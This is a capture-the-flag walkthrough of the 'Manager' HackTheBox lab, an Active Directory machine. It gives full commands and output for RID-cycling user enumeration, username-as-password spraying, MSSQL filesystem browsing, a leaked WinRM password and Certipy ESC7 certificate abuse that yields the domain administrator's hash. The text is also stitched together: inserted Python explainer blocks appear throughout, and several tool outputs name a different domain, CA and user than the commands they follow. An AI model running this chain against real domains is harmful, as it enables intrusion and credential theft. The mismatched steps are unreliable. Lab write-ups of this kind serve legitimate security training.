#windows #AD #medium #mssql #rid #bruteforce #Certificate_Services #winrm #ESC7 #smb
About Manager
Manager is a medium difficulty Windows machine which hosts an Active Directory environment with AD CS (Active Directory Certificate Services), a web server, and an SQL server. The foothold involves enumerating users using RID cycling and performing a password spray attack to gain access to the MSSQL service. The xp_dirtree
procedure is then used to explore the filesystem, uncovering a website backup in the web-root. Extracting the backup reveals credentials that are reused to WinRM to the server. Finally, the attacker escalates privileges through AD CS via ESC7 exploitation.
IP of the machine -> "10.10.11.236"
Recon
Let’s run an Nmap scan to discover any open ports on the remote host.
# Nmap 7.94SVN scan initiated Tue Mar 19 04:22:20 2024 as: nmap -sC -sV -oA nmap_manager 10.10.11.236
Nmap scan report for 10.10.11.236
Host is up (0.26s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Manager
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-19 15:22:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2024-03-19T15:24:06+00:00; +7h00m01s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2024-03-19T15:24:07+00:00; +7h00m01s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.10.11.236:1433:
| Target_Name: MANAGER
| NetBIOS_Domain_Name: MANAGER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: manager.htb
| DNS_Computer_Name: dc01.manager.htb
| DNS_Tree_Name: manager.htb
|_ Product_Version: 10.0.17763
| ms-sql-info:
| 10.10.11.236:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-03-19T12:04:31
|_Not valid after: 2054-03-19T12:04:31
|_ssl-date: 2024-03-19T15:24:06+00:00; +7h00m01s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-19T15:24:06+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2024-03-19T15:24:07+00:00; +7h00m01s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-03-19T15:23:28
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 19 04:24:10 2024 -- 1 IP address (1 host up) scanned in 110.50 seconds
-> As per the Nmap result, port 53 is open and its version is "Simple DNS Plus", and port 80 is also open, serving some kind of "IIS".
So it gives us a hint that we are dealing with some kind of Active Directory.
When we check the later ports, we find port 389 (LDAP) open, and we also find two DNS names in the result -> 1. "manager.htb", 2. "dc01.manager.htb"
So I quickly add both DNS names to my hosts file.
We also find that the RPC, SMB and MSSQL ports are open on this machine.
As the MSSQL port is open, it gives us a hint regarding ==**"kerberoasting"**==
And the more important thing is that there is a ==**"clock skew"**==; right now it's not important, but when we go for kerberoasting we must make sure the clock is in sync.
Let’s start with the Website
It seems to be a static HTML website, because all the links point back to themselves, so nothing interesting here. I am not going to waste my time on content brute force.
SMB
Now, let's proceed with enumerating the SMB shares. We use the smbclient tool to list all the available shares; there is no unusual share available from an authentication standpoint.
Kerberoasting
So I tried to enumerate users via Kerbrute.
Make sure Kerbrute is installed on your system; here I am using the wordlist "xato-net-10-million-usernames.txt" from SecLists.
Here Kerbrute is attempting Kerberos pre-authentication for each candidate username.
In case some of you don't know what Kerberos pre-authentication is:
Kerberos pre-authentication is a security feature designed to prevent password-guessing attacks.
"Pre-authentication adds an extra step before the KDC grants the TGT. During pre-authentication, the client (usually your computer) proves it knows the password for the requested username. Here's how it typically works:
1. The client sends a request to the KDC containing the username.
2. **If pre-authentication is enabled:**
   - The KDC challenges the client with a timestamp.
   - The client encrypts the timestamp using its secret key (derived from the password) and sends it back to the KDC.
3. The KDC decrypts the timestamp using the password hash stored for the username (retrieved from a directory service like Active Directory).
4. If the decrypted timestamp matches the original one, the KDC trusts that the client knows the password and proceeds with issuing the TGT."
Let me also explain it through a tool; here we are using Netexec.
- Let's suppose we somehow get a valid username for this domain and try to authenticate to the domain without knowing the right password. In that case we get the error "KDC_ERR_PREAUTH_FAILED".
- But if we have neither a valid username nor a valid password, we get the error "KDC_ERR_C_PRINCIPAL_UNKNOWN".
Hope you now get what Kerbrute is doing behind the scenes.
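To make the exchange concrete, here is an added example (not from the original write-up) that models the pre-authentication check on both sides and returns the same error names Netexec surfaces; it also shows the clock-skew rejection that the recon notes warned about. The key derivation and the "encryption" (an HMAC tag over the timestamp) are simplifications of the real protocol, and the account data is constructed.

```python
import hashlib
import hmac

REALM = "MANAGER.HTB"
MAX_SKEW = 300  # seconds; Kerberos tolerates 5 minutes of clock difference by default

def string_to_key(password: str, username: str) -> bytes:
    """Derive the principal's long-term key from its password. Real Kerberos AES
    string-to-key also runs PBKDF2 with realm+name as salt; iterations simplified."""
    salt = (REALM + username).encode()
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 4096, 32)

def client_preauth(username: str, password: str, client_clock: int) -> tuple[str, int, bytes]:
    """Client side of AS-REQ: prove knowledge of the key over the current time.
    An HMAC tag stands in for the real encrypted timestamp (PA-ENC-TIMESTAMP)."""
    key = string_to_key(password, username)
    tag = hmac.new(key, str(client_clock).encode(), "sha256").digest()
    return username, client_clock, tag

class KDC:
    """Minimal KDC holding the keys it would otherwise look up in Active Directory."""

    def __init__(self, accounts: dict[str, str]):
        self.keys = {u: string_to_key(p, u) for u, p in accounts.items()}

    def as_req(self, username: str, ts: int, tag: bytes, now: int) -> str:
        if username not in self.keys:
            return "KDC_ERR_C_PRINCIPAL_UNKNOWN"   # no such principal: this is what leaks valid names
        expected = hmac.new(self.keys[username], str(ts).encode(), "sha256").digest()
        if not hmac.compare_digest(expected, tag):
            return "KDC_ERR_PREAUTH_FAILED"        # key mismatch: wrong password
        if abs(now - ts) > MAX_SKEW:
            return "KRB_AP_ERR_SKEW"               # right key, but clocks too far apart
        return "TGT_ISSUED"

def attempt(kdc: KDC, username: str, password: str, now: int, client_offset: int = 0) -> str:
    """One AS-REQ round trip; client_offset models a client clock that is off."""
    user, ts, tag = client_preauth(username, password, now + client_offset)
    return kdc.as_req(user, ts, tag, now)

if __name__ == "__main__":
    kdc = KDC({"operator": "operator"})  # constructed sample account
    for user, pw, off in [("nobody", "x", 0), ("operator", "wrong", 0),
                          ("operator", "operator", 0), ("operator", "operator", 25200)]:
        print(f"{user}/{pw} offset={off}s -> {attempt(kdc, user, pw, 1_700_000_000, off)}")
```

The 25200-second offset in the last case is the 7-hour skew Nmap reported for this box, which is why a correct password can still fail until the clock is synced.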
With the help of Kerbrute, we get some valid usernames. One of the main problems I face here is time: it's a time-consuming process, and if some of the valid usernames are not present in your brute-force list, you will never see them in your result list.
In this kind of scenario we can use RID brute force. This technique is very easy and not time-consuming, you will get the valid usernames within a few minutes, and most importantly you don't even need to provide a good brute-force user list.
What is RID brute forcing?
- Each user account in Active Directory has a unique Security Identifier (SID).
- SIDs are composed of a Domain SID (identifies the domain) and a Relative Identifier (RID), a unique number assigned to the account within that domain.
- The attack method:
  - Null session: The attacker establishes a null session with the domain controller. A null session doesn't require authentication, providing a foothold for the attack.
  - RID cycling: The attacker guesses RIDs sequentially. For each guess, they ask the domain controller to resolve the known domain SID combined with the guessed RID.
  - Verification: If the guessed RID is valid (i.e., belongs to an existing account), the domain controller might respond differently, revealing information to the attacker. This can be a subtle difference, but automated tools can detect these variations.
  - Password spraying: Once a valid RID is identified, the attacker might use it in conjunction with a list of common passwords (password spraying) to find the actual account password.
Command line -> netexec smb 10.10.11.236 -u 'catnew' -p '' --rid-brute
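As an added example (not from the write-up), the following Python decodes the binary objectSid that Active Directory stores, splits it into the domain SID and RID described in the list above, and names the well-known RIDs that exist in every domain, which is the structure RID cycling relies on. The domain SID used is a constructed sample, not manager.htb's.

```python
import struct

# RIDs that mean the same thing in every domain (the reason cycling starts around 500)
WELL_KNOWN_RIDS = {
    500: "Administrator", 501: "Guest", 502: "krbtgt",
    512: "Domain Admins", 513: "Domain Users", 519: "Enterprise Admins",
}

def sid_from_bytes(raw: bytes) -> str:
    """Decode the binary objectSid layout: revision (1 byte), sub-authority count
    (1 byte), identifier authority (6 bytes big-endian), then the sub-authorities
    as 32-bit little-endian integers."""
    revision, count = raw[0], raw[1]
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, raw, 8)
    return "S-%d-%d-%s" % (revision, authority, "-".join(map(str, subs)))

def sid_to_bytes(sid: str) -> bytes:
    """Inverse of sid_from_bytes: the form a lookup request carries on the wire."""
    nums = [int(p) for p in sid.split("-")[1:]]
    revision, authority, subs = nums[0], nums[1], nums[2:]
    header = bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
    return header + struct.pack("<%dI" % len(subs), *subs)

def split_rid(sid: str) -> tuple[str, int]:
    """A domain SID is S-1-5-21-X-Y-Z; an account SID appends one more
    sub-authority, the RID. Return (domain_sid, rid)."""
    domain, _, rid = sid.rpartition("-")
    return domain, int(rid)

def describe_rid(rid: int) -> str:
    """Classify a RID the way an analyst reading rid-brute output would."""
    if rid in WELL_KNOWN_RIDS:
        return WELL_KNOWN_RIDS[rid]
    return "admin-created object" if rid >= 1000 else "other built-in object"

if __name__ == "__main__":
    DOMAIN_SID = "S-1-5-21-1234567890-987654321-1122334455"  # constructed sample
    for rid in (500, 502, 513, 1105):
        sid = sid_from_bytes(sid_to_bytes(f"{DOMAIN_SID}-{rid}"))
        print(sid, "->", describe_rid(split_rid(sid)[1]))
```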
-> With the help of RID brute forcing we get the valid usernames within seconds. Now it is time to filter the result and save only the usernames.
I just save all the results into the All_user_name.txt file and then apply a filter to extract only the usernames.
Here is my final command for filtering ->
cat All_user_name.txt | grep "User" | awk '{print $6}' | awk -F'\\' '{print $2}' | sort -u
Also, if you want to drop all the usernames that end with "$" (machine accounts) and convert everything to lowercase, you can use this command line ->
`cat All_user_name.txt | grep "User" | awk '{print $6}' | awk -F'\\' '{print $2}' | grep -v '\$$' | tr '[:upper:]' '[:lower:]' | sort -u | tee user_list.txt`
I think this is the better approach: it's very easy and quick, and most importantly you don't even need a wordlist to get valid usernames.
So, until now we have valid users; it's time for a valid password.
In many Active Directory environments, a user's username is also going to be its password.
Here I am not doing a password spraying or brute force attack.
==I am simply trying to guess the password using each user's own username.==
Command line ->
netexec smb 10.10.11.236 -u User_list -p User_list --no-bruteforce --continue-on-success
So finally we got some valid usernames as well as the passwords for those usernames.
Let's see what we can achieve using them:
Using the domain:domain cred we got "Access denied".
Using the operator:operator cred we got access, but nothing seems to be important here.
-> As we remember, the MSSQL port was open on this device, so let's explore it.
I used the domain:domain cred and got the same access denied error,
but when I used operator:operator we got access. However, running commands through Netexec is kind of weird for MSSQL, because we do not get an interactive shell.
So I use Impacket for that.
Command line -> impacket-mssqlclient manager/operator:operator@manager.htb -windows-auth
Woo-hoo, we got access, but when I tried to run any command I got a permission denied error.
But there is the stored procedure "xp_dirtree", and we don't need any special privileges to run it.
In the folder listing we can see the "inetpub" folder. When I enumerated further, I found one .zip named "website-backup-27-07-23-old.zip" in this folder.
As this file is present in the inetpub folder, we can access it via the website.
xp_dirtree c:\inetpub\wwwroot
I just downloaded the .zip file from the website,
or you can do it with wget http://manager.htb/website-backup-27-07-23-old.zip
After that I just unzip the file [unzip website-backup-27-07-23-old.zip], and when we check the hidden files in this folder, I find one interesting file named ".old-conf.xml".
When we open the file we get the ID and password of the user "raven" ❤💲🆗🏴☠️
I re-verified the cred through Netexec for SMB, but there is no interesting share available for this user.
But when I checked another method to log in with this cred, I found we were able to log in via "WinRM".
Command line -> netexec winrm 10.10.11.236 -u 'raven' -p 'R4v3nBe5tD3veloP3r!123'
So I quickly spawned evil-winrm. Boom, we got our first user flag.
Command line ->
evil-winrm -i 10.10.11.236 -u 'raven' -p 'R4v3nBe5tD3veloP3r!123'
So, it's time for the root flag.
If you remember, the machine description talked about "Active Directory Certificate Services",
so it seems to be some kind of vuln related to Certificate Services.
So I run Certipy to check whether any vuln is present for any certificate template or CA.
Command line ->
certipy-ad find -dc-ip 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123' -stdout -vulnerable
Certipy v4.7.0 — by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for ‘manager-DC01-CA’ via CSRA
[*] Got CA configuration for ‘manager-DC01-CA’
[*] Enumeration output:
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023–07–27 10:21:05+00:00
Certificate Validity End : 2122–07–27 10:31:04+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
[!] Vulnerabilities
==ESC7== : ‘MANAGER.HTB\\Raven’ has dangerous permissions
Certificate Templates : [!] Could not find any certificate templates
As per the result, it seems to be some kind of vuln related to ESC7. I just googled and found one article from HackTricks about it.
I just followed all the steps mentioned in the HackTricks blog and got the hash of the administrator.
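Before the exploitation steps, here is an added example (not from the write-up, and not Certipy's own code) that reads the Access Rights block printed above and flags exactly the ESC7 condition: any principal outside the expected admin groups holding ManageCa or ManageCertificates on the CA. The sample text is reconstructed from the output in this post; the expected-admin set is an assumption you would tune per environment.

```python
import re

# Reconstructed from the Certipy output shown above (constructed sample text).
SAMPLE_CA_OUTPUT = """\
Access Rights
Enroll : MANAGER.HTB\\Operator
MANAGER.HTB\\Authenticated Users
MANAGER.HTB\\Raven
ManageCa : MANAGER.HTB\\Administrators
MANAGER.HTB\\Domain Admins
MANAGER.HTB\\Enterprise Admins
MANAGER.HTB\\Raven
ManageCertificates : MANAGER.HTB\\Administrators
MANAGER.HTB\\Domain Admins
MANAGER.HTB\\Enterprise Admins
"""

# Who is allowed to manage the CA; anyone else holding these rights is an ESC7 finding.
# Assumption for this example: adjust to the groups your environment actually delegates to.
EXPECTED_CA_ADMINS = {"Administrators", "Domain Admins", "Enterprise Admins"}
DANGEROUS_RIGHTS = {"ManageCa", "ManageCertificates"}

def parse_access_rights(text: str) -> dict[str, list[str]]:
    """Group principals under the right they are listed beneath: a 'Right : DOMAIN\\name'
    line starts a new right, and following bare 'DOMAIN\\name' lines belong to it."""
    rights: dict[str, list[str]] = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        m = re.match(r"^(\w+)\s*:\s*(.+)$", line)
        if m:
            current = m.group(1)
            rights.setdefault(current, []).append(m.group(2))
        elif current and "\\" in line:
            rights[current].append(line)
    return rights

def esc7_findings(text: str) -> list[tuple[str, str]]:
    """Return (right, principal) pairs where a non-admin principal can manage the CA."""
    findings = []
    for right, principals in parse_access_rights(text).items():
        if right in DANGEROUS_RIGHTS:
            for principal in principals:
                if principal.split("\\", 1)[-1] not in EXPECTED_CA_ADMINS:
                    findings.append((right, principal))
    return findings
```

Run against the sample it reports Raven under ManageCa and nothing under ManageCertificates, which matches the single ESC7 line Certipy printed.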
certipy find -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -stdout -vulnerable
certipy ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.0.0 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'John' on 'corp-DC-CA'
# List templates
certipy ca -username raven@manager.htb -password Passw0rd! -target-ip ca.corp.local -ca 'corp-CA' -enable-template 'SubCA'
## If SubCA is not there, you need to enable it
# Enable SubCA
certipy ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.0.0 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'corp-DC-CA'
certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -target dc01.manager.htb -template SubCA -upn administrator@manager.htb
Certipy v4.0.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 785
Would you like to save the private key? (y/N) y
[*] Saved private key to 785.key
[-] Failed to request certificate
certipy ca -ca 'manager-DC01-CA' -issue-request 785 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.0.0 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca corp-DC-CA -target ca.corp.local -retrieve 785
Certipy v4.0.0 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 785
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@corp.local'
[*] Certificate has no object SID
[*] Loaded private key from '785.key'
[*] Saved certificate and private key to 'administrator.pfx'
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT…
[*] Got TGT
[*] Saved credential cache to ‘administrator.ccache’
[*] Trying to retrieve NT hash for ‘administrator’
[*] Got hash for ‘administrator@manager.htb’: aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
If you get any kind of clock skew error, use this command:
sudo ntpdate -u manager.htb
I hope you enjoyed and also learned new things from this machine.
If you think that writeups help you,
then share them with other security researchers....
KEEP HACKING, KEEP LEARNING 😎😎